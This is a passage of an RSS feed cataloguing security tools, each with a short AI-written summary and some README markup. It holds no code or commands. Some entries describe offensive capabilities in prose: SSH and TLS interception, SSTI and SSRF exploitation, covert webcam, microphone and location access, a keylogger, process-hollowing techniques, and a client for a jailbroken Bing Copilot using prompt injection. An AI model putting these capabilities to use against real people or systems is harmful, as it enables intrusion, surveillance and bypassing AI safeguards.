&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SSH-MITM is a security auditing tool that functions as a man-in-the-middle SSH server, capable of intercepting and analyzing SSH sessions. It supports various authentication methods, including public key and password authentication, along with features like session hijacking, file manipulation during SCP/SFTP transfers, and dynamic port forwarding. Notably, it also includes capabilities for phishing FIDO tokens and auditing clients for known vulnerabilities, making it a versatile solution for security assessments.&lt;/p&gt;</description></item><item><title>ssl-kill-switch2</title><link>https://rainmana.github.io/hackyfeed/tools/nabla-c0d3-ssl-kill-switch2/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nabla-c0d3-ssl-kill-switch2/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SSL Kill Switch 2 is a blackbox tool designed to disable SSL/TLS certificate validation, including certificate pinning, in iOS and macOS applications. This tool modifies low-level functions managing SSL/TLS connections to bypass the system&amp;rsquo;s default validation, enabling man-in-the-middle attacks on SSL or HTTPS traffic. It supports installation as a Cydia Substrate tweak on jailbroken iOS devices and can be injected as a dynamic library into macOS applications for similar functionality.&lt;/p&gt;</description></item><item><title>SSRF-Testing</title><link>https://rainmana.github.io/hackyfeed/tools/cujanovic-ssrf-testing/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cujanovic-ssrf-testing/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SSRF-Testing is a tool designed for testing and exploiting Server Side Request Forgery (SSRF) vulnerabilities. It provides a variety of resources, including quick URL bypass methods, custom HTTP response generation, and a minimal web server setup for testing different response codes across various file types. Notably, it also includes an IP encoding utility to facilitate testing within whitelisted domains.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.buymeacoffee.com/cujanovic" target="_blank"&gt;&lt;img src="https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png" alt="Buy Me A Coffee" style="height: 60px !important;width: 217px !important;" &gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>SSTImap</title><link>https://rainmana.github.io/hackyfeed/tools/vladko312-sstimap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vladko312-sstimap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SSTImap is a penetration testing tool designed to identify and exploit Server-Side Template Injection (SSTI) vulnerabilities in web applications. Its notable features include an interactive mode for enhanced exploitation, support for various programming languages and template engines, and a modular plugin architecture allowing for extensibility. The tool enables advanced exploitation techniques, including the use of generic payloads and evaluation scenarios.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="sstimap"&gt;SSTImap&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/vladko312/sstimap"&gt;&lt;img src="https://img.shields.io/badge/version-1.3-green.svg?logo=github" alt="Version 1.3"&gt;&lt;/a&gt;
&lt;a href="https://www.python.org/downloads/release/python-3130/"&gt;&lt;img src="https://img.shields.io/badge/python-3.13-blue.svg?logo=python" alt="Python 3.13"&gt;&lt;/a&gt;
&lt;a href="https://www.python.org/downloads/release/python-360/"&gt;&lt;img src="https://img.shields.io/badge/python-3.6+-yellow.svg?logo=python" alt="Python 3.6"&gt;&lt;/a&gt;
&lt;a href="https://www.gnu.org/licenses/gpl-3.0.txt"&gt;&lt;img src="https://img.shields.io/github/license/vladko312/sstimap?color=green&amp;amp;logo=gnu" alt="GitHub"&gt;&lt;/a&gt;
&lt;a href="https://github.com/vladko312/sstimap/commits/"&gt;&lt;img src="https://img.shields.io/github/last-commit/vladko312/sstimap?color=green&amp;amp;logo=github" alt="GitHub last commit"&gt;&lt;/a&gt;
&lt;a href="https://github.com/vladko312/sstimap"&gt;&lt;img src="https://img.shields.io/maintenance/yes/2026?logo=github" alt="Maintenance"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>SteamKit</title><link>https://rainmana.github.io/hackyfeed/tools/steamre-steamkit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/steamre-steamkit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SteamKit is a .NET library that facilitates interaction with Valve&amp;rsquo;s Steam network, providing a flexible and extensible interface for executing various network operations. Its primary use case is enabling developers to create applications that can leverage Steam&amp;rsquo;s functionalities, such as game management and account handling. Notable features include its distribution as a NuGet package for easy integration, comprehensive XML documentation, and support for .NET 10.0 or higher.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="steamkit"&gt;SteamKit&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/SteamRE/SteamKit/actions/workflows/steamkit2-build.yaml"&gt;&lt;img src="https://github.com/SteamRE/SteamKit/actions/workflows/steamkit2-build.yaml/badge.svg?event=push" alt="Build Status (CI/CD)"&gt;&lt;/a&gt;
&lt;a href="https://www.nuget.org/packages/SteamKit2/"&gt;&lt;img src="https://img.shields.io/nuget/v/SteamKit2.svg" alt="NuGet"&gt;&lt;/a&gt;
&lt;a href="https://codecov.io/gh/SteamRE/SteamKit"&gt;&lt;img src="https://codecov.io/gh/SteamRE/SteamKit/branch/master/graph/badge.svg?token=qkJCxZI6rd" alt="codecov"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>SteamTracking</title><link>https://rainmana.github.io/hackyfeed/tools/steamtracking-steamtracking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/steamtracking-steamtracking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SteamTracking is a tool designed to automate the monitoring of various metrics associated with Steam accounts and game performance. Its primary use case is to streamline the process of tracking gameplay statistics and trends, reducing the manual effort required for users. Notable features include automated data collection and user-friendly insights into gaming habits.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="steam-tracking"&gt;Steam Tracking&lt;/h2&gt;
&lt;p&gt;Tracking things, so you don&amp;rsquo;t have to.&lt;/p&gt;</description></item><item><title>stegcloak</title><link>https://rainmana.github.io/hackyfeed/tools/kurolabs-stegcloak/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/kurolabs-stegcloak/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; StegCloak is a JavaScript steganography module that conceals secrets within text by using invisible Unicode characters after compressing and encrypting the data. It is designed for covert communication, allowing users to safely embed strings in various platforms while ensuring cryptographic security through AES-256-CTR encryption and HMAC integrity checks. Key features include high-speed processing, support for hiding file links, and a flexible interface available via API, command-line, and web interface.&lt;/p&gt;</description></item><item><title>stego-toolkit</title><link>https://rainmana.github.io/hackyfeed/tools/dominicbreuker-stego-toolkit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dominicbreuker-stego-toolkit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Stego-Toolkit is a Docker image designed for tackling steganography challenges frequently encountered in CTF platforms. It comes pre-loaded with a variety of popular tools and screening scripts that facilitate the analysis of images and audio files for hidden data, allowing users to effortlessly run command-line and GUI applications within a containerized environment. Notable features include automation scripts for file screening and support for both Linux and Windows tools via Wine, ensuring a comprehensive toolkit for steganography analysis.&lt;/p&gt;</description></item><item><title>stegseek</title><link>https://rainmana.github.io/hackyfeed/tools/rickdejager-stegseek/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rickdejager-stegseek/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Stegseek is a high-performance steghide cracker designed to efficiently extract hidden data from files, achieving remarkable speeds by leveraging a comprehensive wordlist, such as &lt;code&gt;rockyou.txt&lt;/code&gt;, to crack passwords in under two seconds. Its primary use case includes both password cracking and the detection of steghide metadata without requiring passwords, enabling users to ascertain file contents speedily. Notable features include the ability to brute-force the random number generator used in steghide to recover unencrypted files and detailed metadata extraction.&lt;/p&gt;</description></item><item><title>Storm-Breaker</title><link>https://rainmana.github.io/hackyfeed/tools/ultrasecurity-storm-breaker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ultrasecurity-storm-breaker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Storm-Breaker is a versatile cybersecurity tool that enables unauthorized access to device information, including location, webcam, and microphone on smartphones, without requiring user permissions. Notable features include a revamped web user interface, the ability to operate on personal hosting environments, auto-download functionality for Ngrok, and comprehensive logging capabilities. This tool is primarily designed for penetration testing and social engineering exercises within controlled environments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 &lt;br&gt;
 &lt;a href="https://github.com/ultrasecurity/Storm-Breaker"&gt;&lt;img src=".imgs/1demo.png" alt="StormBreaker"&gt;&lt;/a&gt;
&lt;/h1&gt;
&lt;h4 align="center"&gt;A Tool With Attractive Capabilities. &lt;/h4&gt;
&lt;p align="center"&gt;
 &lt;a href="http://python.org"&gt;
 &lt;img src="https://img.shields.io/badge/python-v3-blue"&gt;
 &lt;/a&gt;
 &lt;a href="https://php.net"&gt;
 &lt;img src="https://img.shields.io/badge/php-7.4.4-green"
 alt="php"&gt;
 &lt;/a&gt;
 &lt;a href="https://en.wikipedia.org/wiki/Linux"&gt;
 &lt;img src="https://img.shields.io/badge/Platform-Linux-red"&gt;
 &lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Stowaway</title><link>https://rainmana.github.io/hackyfeed/tools/ph4ntonn-stowaway/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ph4ntonn-stowaway/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Stowaway is a multi-tier proxy tool written in Go, designed specifically for penetration testers to route external traffic through multiple nodes into an internal network, thereby overcoming access restrictions. Notable features include user-friendly command-line interface, tree structure node management, support for various connection types (socks5, HTTP, SSH), traffic encryption using TLS/AES-256-GCM, and capabilities for remote shell, file transfer, and port mapping, all while maintaining compatibility across multiple platforms such as Linux, Mac, and Windows.&lt;/p&gt;</description></item><item><title>stunner</title><link>https://rainmana.github.io/hackyfeed/tools/firefart-stunner/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/firefart-stunner/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Stunner is a specialized tool designed for testing and exploiting STUN and TURN servers, particularly in the context of videoconferencing and audio chat applications utilizing the TURN protocol. Its primary use case involves identifying misconfigurations in TURN servers, enabling users to establish a SOCKS proxy that routes traffic through these servers into internal networks. Notable features include the ability to enumerate accessible IP addresses, perform detailed server information queries, and set up a local SOCKS server for traffic relaying.&lt;/p&gt;</description></item><item><title>SubDomainizer</title><link>https://rainmana.github.io/hackyfeed/tools/nsonaniya2010-subdomainizer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nsonaniya2010-subdomainizer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SubDomainizer is a reconnaissance tool that identifies hidden subdomains and secrets from specified URLs, web pages, and external JavaScript files. It supports various cloud storage services and can detect S3 buckets and CloudFront URLs, potentially exposing vulnerabilities such as open read/write permissions and subdomain takeover risks. The tool is capable of scanning both individual URLs and lists, with a feature for extracting secrets based on keyword searches and Shannon Entropy calculations, although this is currently in beta phase.&lt;/p&gt;</description></item><item><title>subjack</title><link>https://rainmana.github.io/hackyfeed/tools/haccer-subjack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/haccer-subjack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Subjack is a DNS takeover scanner written in Go, designed for the concurrent scanning of domain lists to identify registrable domains vulnerable to hijacking. It features detection capabilities for various vulnerability types including CNAME takeovers, NS delegation issues, stale A records, and more, allowing security professionals to assess the risk of domain takeovers effectively. With an emphasis on speed and efficiency, Subjack provides functionalities such as customizable concurrency and thorough output options to facilitate large-scale testing.&lt;/p&gt;</description></item><item><title>sublert</title><link>https://rainmana.github.io/hackyfeed/tools/yassineaboukir-sublert/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/yassineaboukir-sublert/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Sublert is a Python-based security tool designed for monitoring new subdomains associated with specific organizations by leveraging certificate transparency. It facilitates automated alerts to a Slack workspace for newly identified subdomains and includes functionalities for DNS resolution to verify active subdomains. Key features include periodic monitoring, configuration options for concurrent threads, and logging capabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt; _____ __ __ __
 / ___/__ __/ /_ / /__ _____/ /_
 \__ \/ / / / __ \/ / _ \/ ___/ __/
 ___/ / /_/ / /_/ / / __/ / / /_
 /____/\__,_/_.___/_/\___/_/ \__/

 Author: Yassine Aboukir
 Version: 1.4.7
&lt;/code&gt;&lt;/pre&gt;
&lt;p align="center"&gt;&lt;a href="https://twitter.com/yassineaboukir" target="_blank"&gt;&lt;img src="https://img.shields.io/twitter/follow/yassineaboukir.svg?logo=twitter"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>SubOver</title><link>https://rainmana.github.io/hackyfeed/tools/ice3man543-subover/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ice3man543-subover/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SubOver is a Golang-based tool designed for detecting potential subdomain takeovers across more than 30 services, leveraging Go&amp;rsquo;s concurrency for enhanced speed and efficiency. Its primary use case is for security professionals conducting assessments of web applications to identify vulnerable subdomains that can be hijacked. Notable features include a comprehensive service list, customizable concurrent threads, and a straightforward command-line interface for easy operation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="subover"&gt;SubOver&lt;/h1&gt;
&lt;h2 id="note---this-project-is-discontinued-no-more-updates-will-be-provided-sorry"&gt;Note - This project is discontinued. No more updates will be provided! Sorry!&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;But something more awesome will come soon!&lt;/p&gt;</description></item><item><title>subscraper</title><link>https://rainmana.github.io/hackyfeed/tools/m8sec-subscraper/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m8sec-subscraper/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SubScraper is a subdomain enumeration tool designed for penetration testers and bug bounty hunters, enabling the discovery of an organization&amp;rsquo;s attack surface through multiple techniques. It supports DNS resolution, HTTP(S) requests, and CNAME lookups, along with modular support for various data sources and the capability to handle multiple targets. Key features include compatibility with Windows CLI, output formatting in .txt or .csv, and easy extensibility to add new enumeration methods.&lt;/p&gt;</description></item><item><title>SUDO_KILLER</title><link>https://rainmana.github.io/hackyfeed/tools/th3xace-sudo_killer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/th3xace-sudo_killer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SUDO_KILLER is a cybersecurity tool designed for professionals such as pentesters and security auditors, focusing on privilege escalation vulnerabilities in Linux systems related to SUDO configuration and usage. It manually identifies issues such as misconfigurations, risky binaries, and version-based vulnerabilities (CVEs), enabling users to exploit these weaknesses for gaining root-level privileges. The tool provides a detailed checklist of potential local exploits and requires users to perform the exploitation process manually, ensuring a controlled approach to privilege escalation testing.&lt;/p&gt;</description></item><item><title>Sudomy</title><link>https://rainmana.github.io/hackyfeed/tools/screetsec-sudomy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/screetsec-sudomy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Sudomy is a subdomain enumeration and analysis tool designed for advanced automated reconnaissance and OSINT activities. It features both active and passive enumeration methods, utilizing efficient techniques such as DNS brute-forcing via Gobuster and data collection from 22 curated third-party sources. Additional capabilities include subdomain testing, virtual host classification, port scanning, and technology identification, making it a comprehensive solution for penetration testing and bug bounty applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="sudomy"&gt;Sudomy&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/Screetsec/Sudomy/blob/master/LICENSE.md"&gt;&lt;img src="https://img.shields.io/badge/license-MIT-red.svg" alt="License"&gt;&lt;/a&gt; &lt;a href="https://github.com/Screetsec/Sudomy/actions"&gt;&lt;img src="https://action-badges.now.sh/screetsec/sudomy" alt="Build Status"&gt;&lt;/a&gt; &lt;a href=""&gt;&lt;img src="https://img.shields.io/badge/Release-1.2.1-red.svg?maxAge=259200" alt="Version"&gt;&lt;/a&gt; &lt;a href=""&gt;&lt;img src="https://img.shields.io/badge/Supported_OS-Linux-yellow.svg" alt="Build"&gt;&lt;/a&gt; &lt;a href=""&gt;&lt;img src="https://img.shields.io/badge/Supported_WSL-Windows-blue.svg" alt="Build"&gt;&lt;/a&gt; &lt;a href="https://github.com/screetsec/sudomy/issues"&gt;&lt;img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat" alt="Contributions Welcome"&gt;&lt;/a&gt; &lt;a href="https://www.paypal.me/screetsec"&gt;&lt;img src="https://img.shields.io/badge/Donate-PayPal-green.svg" alt="Donate"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Swift-Keylogger</title><link>https://rainmana.github.io/hackyfeed/tools/skreweverything-swift-keylogger/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/skreweverything-swift-keylogger/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Swift-Keylogger is a macOS tool designed to monitor and log keystrokes while providing contextual information about the applications generating those keystrokes. It utilizes low-level HID APIs to ensure stability despite Apple’s deprecation of certain high-level APIs and organizes the logged data by application and timestamps in a structured directory format. The tool can be integrated with Cocoa applications, offering both executable usage and source code incorporation, making it flexible for developers.&lt;/p&gt;</description></item><item><title>SwiftnessX</title><link>https://rainmana.github.io/hackyfeed/tools/ehrishirajsharma-swiftnessx/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ehrishirajsharma-swiftnessx/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SwiftnessX is a cross-platform note-taking and target-tracking application designed specifically for penetration testers, built on the ElectronJS framework. It features customizable checklists, including the OWASP Testing Checklist, and allows users to import/export their checklists, enhancing organized documentation throughout the penetration testing process. The tool aims to streamline the workflow for security professionals by providing a unified interface for managing testing notes and methodologies.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 &lt;br&gt;
 &lt;img src="https://s15.postimg.cc/omhc6tcrv/256px_2x.png" alt="Swiftness" width="100"&gt;&lt;/a&gt;
 &lt;br&gt;
 SwiftnessX v0.2
 &lt;br&gt;
&lt;/h1&gt;
&lt;div align="center"&gt;
&lt;p&gt;&lt;a href="https://forthebadge.com"&gt;&lt;img src="https://forthebadge.com/images/badges/made-with-javascript.svg" alt="forthebadge"&gt;&lt;/a&gt; &lt;a href="https://forthebadge.com"&gt;&lt;img src="https://forthebadge.com/images/badges/winter-is-coming.svg" alt="forthebadge"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>SydneyQt</title><link>https://rainmana.github.io/hackyfeed/tools/juzeon-sydneyqt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/juzeon-sydneyqt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SydneyQt is a cross-platform desktop client designed for the jailbroken New Bing AI Copilot, enabling advanced interactions with the AI through capabilities such as prompt injection, CAPTCHA resolution via Selenium, and context editing. Key features include support for various file types and multimedia interactions, customizable quick responses, and integration with OpenAI&amp;rsquo;s API, all presented within a modern and user-friendly interface. The tool is built with Go and Wails, offering robust functionality while allowing users to bypass regional restrictions and enhance their AI interactions.&lt;/p&gt;</description></item><item><title>sysmon-modular</title><link>https://rainmana.github.io/hackyfeed/tools/olafhartong-sysmon-modular/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/olafhartong-sysmon-modular/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; sysmon-modular is a modular Sysmon configuration repository designed for customization and maintenance of Microsoft Sysinternals&amp;rsquo; Sysmon tool. Its primary use case is to generate tailored event logging configurations for monitoring system behavior and enhancing threat detection in diverse environments. Notable features include pre-generated configurations catering to different verbosity levels, a flexible module system for incorporating custom configurations, and automated XML generation through a PowerShell script integrated with Azure Pipelines.&lt;/p&gt;</description></item><item><title>T-LOAD</title><link>https://rainmana.github.io/hackyfeed/tools/noob-hackers-t-load/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/noob-hackers-t-load/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; T-load is a bash-based script designed for customizing the Termux terminal interface on both rooted and non-rooted Android devices. Its primary use case is to enhance the user experience by providing an attractive and engaging terminal environment, complete with sound effects and an updated layout. Notable features include an easy installation process, new interface options, and the ability to revert to the default terminal settings.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
&lt;a href="https://bit.ly/3jPqXEB"&gt;&lt;img title="Made in INDIA" src="https://img.shields.io/badge/MADE%20IN-INDIA-SCRIPT?colorA=%23ff8100&amp;colorB=%23017e40&amp;colorC=%23ff0000&amp;style=for-the-badge"&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>tabby</title><link>https://rainmana.github.io/hackyfeed/tools/tabby-sec-tabby/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tabby-sec-tabby/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; TABBY is a static code analysis tool designed for Java that rapidly identifies various types of vulnerabilities within Java applications. It utilizes the Soot framework to transform Java bytecode (JAR/WAR/CLASS files) into a code property graph (CPG), which is then stored in a Neo4j graph database, allowing for complex taint analysis and vulnerability chain detection through simple Cypher queries. Notable features include the ability to discover deserialization attack chains and common web vulnerabilities, significantly enhancing the efficiency of code audits by reducing manual search efforts.&lt;/p&gt;</description></item><item><title>TangledWinExec</title><link>https://rainmana.github.io/hackyfeed/tools/daem0nc0re-tangledwinexec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/daem0nc0re-tangledwinexec/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Tangled WinExec is a repository that provides a collection of proof-of-concept tools focused on various Windows process execution techniques, aimed at facilitating investigation and understanding of these methods. Notable features include techniques such as Process Hollowing, Command Line Spoofing, and Process Doppelgänging, with some PoCs tailored for specific Windows versions and kernel protection mechanisms. Each toolset includes documentation for testing and utilization, enabling advanced users to explore process manipulation techniques effectively.&lt;/p&gt;</description></item><item><title>taranis-ai</title><link>https://rainmana.github.io/hackyfeed/tools/taranis-ai-taranis-ai/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/taranis-ai-taranis-ai/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Taranis AI is an advanced Open-Source Intelligence (OSINT) tool that utilizes Artificial Intelligence and Natural Language Processing to gather and enhance information from various unstructured data sources, primarily news articles. Its notable features include a streamlined workflow for analysts to convert unstructured data into structured reports, multi-format output capabilities, seamless publication of intelligence products, and experimental support for collaborative threat intelligence via integration with MISP.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="taranis-ai"&gt;Taranis AI&lt;/h1&gt;
&lt;p&gt;&lt;img src="./resources/images/logo.svg" alt="Logo"&gt;&lt;/p&gt;</description></item><item><title>Tata-Sky-IPTV</title><link>https://rainmana.github.io/hackyfeed/tools/forcegt-tata-sky-iptv/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/forcegt-tata-sky-iptv/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Tata Sky/Play IPTV Script generator is a tool that creates an m3u playlist containing direct streamable files, specifically designed for users with a Tata Sky subscription. It offers both an easy-to-use app and a command-line script for generating the playlist, with features like automatic login credential storage and expiration notifications for the generated playlist. This tool is primarily aimed at facilitating seamless access to subscribed channels through compatible IPTV applications.&lt;/p&gt;</description></item><item><title>TegraRcmGUI</title><link>https://rainmana.github.io/hackyfeed/tools/eliboa-tegrarcmgui/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/eliboa-tegrarcmgui/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; TegraRcmGUI is a Windows-based graphical user interface that facilitates the injection of payloads into Nintendo Switch consoles utilizing the Fusée Gelée exploit for RCM mode. Key features include the ability to manage favorites, run Linux on the Switch, mount the device as USB mass storage, and dump BIS keys for eMMC content decryption. The tool also offers conveniences such as auto-injection options, minimizing to the system tray, and automatic startup with Windows.&lt;/p&gt;</description></item><item><title>Telegram-OSINT</title><link>https://rainmana.github.io/hackyfeed/tools/the-osint-toolbox-telegram-osint/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/the-osint-toolbox-telegram-osint/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Telegram-OSINT is a comprehensive resource hub designed for open-source intelligence (OSINT) researchers focusing on the Telegram platform. It provides guides, tools, and best practices to ensure users maintain operational security (OPSEC) while gathering intelligence, including constructing virtual machines for safe research. Noteworthy features include links to various blogs, tools, and a transparency report bot, addressing the complexities of OSINT in a rapidly changing digital landscape.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="telegram-osint"&gt;Telegram-OSINT&lt;/h1&gt;
&lt;p&gt;&lt;br&gt;&lt;/br&gt;&lt;/p&gt;</description></item><item><title>telegram-scraper</title><link>https://rainmana.github.io/hackyfeed/tools/unnohwn-telegram-scraper/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/unnohwn-telegram-scraper/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Telegram Channel Scraper is a Python-based tool that enables users to scrape messages and media from Telegram channels using the Telethon library. Key features include real-time scraping, enhanced metadata capture such as message statistics and reactions, smart filtering for channel management, and data export capabilities in CSV and JSON formats. With automatic database migration and a user-friendly interactive menu, it supports efficient channel monitoring and data retrieval.&lt;/p&gt;</description></item><item><title>TelemetrySourcerer</title><link>https://rainmana.github.io/hackyfeed/tools/jthuraisamy-telemetrysourcerer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jthuraisamy-telemetrysourcerer/</guid><description>&lt;blockquote&gt;
